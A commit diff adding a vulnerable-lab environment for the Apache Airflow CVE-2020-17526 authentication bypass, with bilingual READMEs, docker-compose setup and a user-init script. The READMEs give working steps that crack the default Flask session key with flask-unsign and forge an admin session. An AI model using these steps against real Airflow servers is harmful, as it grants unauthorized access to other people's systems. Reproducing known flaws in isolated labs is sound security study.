first commit

airflow/CVE-2020-17526/README.md

@@ -0,0 +1,56 @@
+# Apache Airflow Authentication Bypass (CVE-2020-17526)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Airflow is an open source, distributed task scheduling framework. Although authentication is not required by default, but the administration can specify the `webserver.authenticate=True` to enable it.
+
+In the version prior to 1.10.13, Apache Airflow uses a default session secert key, which leads to impersonate arbitrary user when authentication is enabled.
+
+References:
+
+- <https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0>
+- <https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise>
+
+## Vulnerability Environment
+
+Execute the following commands to start an airflow 1.10.10 server:
+
+```bash
+#Initialize the database
+docker compose run airflow-init
+
+#Start service
+docker compose up -d
+```
+
+After the server is started, browse the `http://your-ip:8080` to see the login page of Apache Airflow. Yes, this server required authentication.
+
+## Exploit
+
+Firstly, browse the login page and get a session string from Cookie:
+
+```
+curl -v http://localhost:8080/admin/airflow/login
+```
+
+![](1.png)
+
+Then, use [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) to crack the session key:
+
+```
+flask-unsign -u -c [session from Cookie]
+```
+
+![](2.png)
+
+Bingo, we got the valid session key `temporary_key`. Then, use this key to generate a new session whose `user_id` equals to `1`:
+
+```
+flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
+```
+
+![](3.png)
+
+Finally, use this generated session to log in successfully:
+
+![](4.png)

airflow/CVE-2020-17526/README.zh-cn.md

@@ -0,0 +1,56 @@
+# Apache Airflow 默认密钥导致的权限绕过（CVE-2020-17526）
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Airflow是一款开源的，分布式任务调度框架。默认情况下，Apache Airflow无需用户认证，但管理员也可以通过指定`webserver.authenticate=True`来开启认证。
+
+在其1.10.13版本及以前，即使开启了认证，攻击者也可以通过一个默认密钥来绕过登录，伪造任意用户。
+
+参考链接：
+
+- <https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0>
+- <https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise>
+
+## 漏洞环境
+
+执行如下命令启动一个Apache Airflow 1.10.10服务器：
+
+```bash
+#Initialize the database
+docker compose run airflow-init
+
+#Start service
+docker compose up -d
+```
+
+服务器启动后，访问`http://your-ip:8080`即可查看到登录页面。
+
+## 漏洞利用
+
+首先，我们访问登录页面，服务器会返回一个签名后的Cookie：
+
+```
+curl -v http://localhost:8080/admin/airflow/login
+```
+
+![](1.png)
+
+然后，使用[flask-unsign](https://github.com/Paradoxis/Flask-Unsign)这个工具来爆破签名时使用的`SECRET_KEY`：
+
+```
+flask-unsign -u -c [session from Cookie]
+```
+
+![](2.png)
+
+Bingo，成功爆破出Key是`temporary_key`。使用这个key生成一个新的session，其中伪造`user_id`为1：
+
+```
+flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
+```
+
+![](3.png)
+
+在浏览器中使用这个新生成的session，可见已成功登录：
+
+![](4.png)

airflow/CVE-2020-17526/docker-compose.yml

@@ -0,0 +1,92 @@
+version: '3'
+x-airflow-common:
+  &airflow-common
+  image: vulhub/airflow:1.10.10
+  environment:
+    &airflow-common-env
+    AIRFLOW__CORE__EXECUTOR: CeleryExecutor
+    AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
+    AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
+    AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
+    AIRFLOW__CORE__FERNET_KEY: ''
+    AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
+    AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
+    AIRFLOW__WEBSERVER__AUTHENTICATE: 'true'
+    AIRFLOW__WEBSERVER__AUTH_BACKEND: 'airflow.contrib.auth.backends.password_auth'
+  user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
+  depends_on:
+    redis:
+      condition: service_healthy
+    postgres:
+      condition: service_healthy
+
+services:
+  postgres:
+    image: postgres:13-alpine
+    environment:
+      POSTGRES_USER: airflow
+      POSTGRES_PASSWORD: airflow
+      POSTGRES_DB: airflow
+    healthcheck:
+      test: ["CMD", "pg_isready", "-U", "airflow"]
+      interval: 5s
+      retries: 5
+
+  redis:
+    image: redis:5-alpine
+    healthcheck:
+      test: ["CMD", "redis-cli", "ping"]
+      interval: 5s
+      timeout: 30s
+      retries: 50
+
+  airflow-webserver:
+    <<: *airflow-common
+    command: webserver
+    ports:
+      - 8080:8080
+    healthcheck:
+      test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
+      interval: 10s
+      timeout: 10s
+      retries: 5
+
+  airflow-scheduler:
+    <<: *airflow-common
+    command: scheduler
+    healthcheck:
+      test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
+      interval: 10s
+      timeout: 10s
+      retries: 5
+
+  airflow-worker:
+    <<: *airflow-common
+    command: worker
+    healthcheck:
+      test:
+        - "CMD-SHELL"
+        - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
+      interval: 10s
+      timeout: 10s
+      retries: 5
+
+  airflow-init:
+    <<: *airflow-common
+    entrypoint: python /opt/airflow/init-user.py
+    volumes:
+      - ./init-user.py:/opt/airflow/init-user.py
+    environment:
+      <<: *airflow-common-env
+      _AIRFLOW_DB_UPGRADE: 'true'
+
+  flower:
+    <<: *airflow-common
+    command: flower
+    ports:
+      - 5555:5555
+    healthcheck:
+      test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
+      interval: 10s
+      timeout: 10s
+      retries: 5

airflow/CVE-2020-17526/init-user.py

@@ -0,0 +1,17 @@
+#!/usr/bin/env python
+import os
+from airflow import models, settings
+from airflow.contrib.auth.backends.password_auth import PasswordUser
+
+os.system('/entrypoint initdb')
+
+user = PasswordUser(models.User())
+user.username = 'vulhub'
+user.email = 'vulhub@example.com'
+user.password = 'vulhub'
+user.superuser = True
+session = settings.Session()
+session.add(user)
+session.commit()
+session.close()
+print('initial user finished')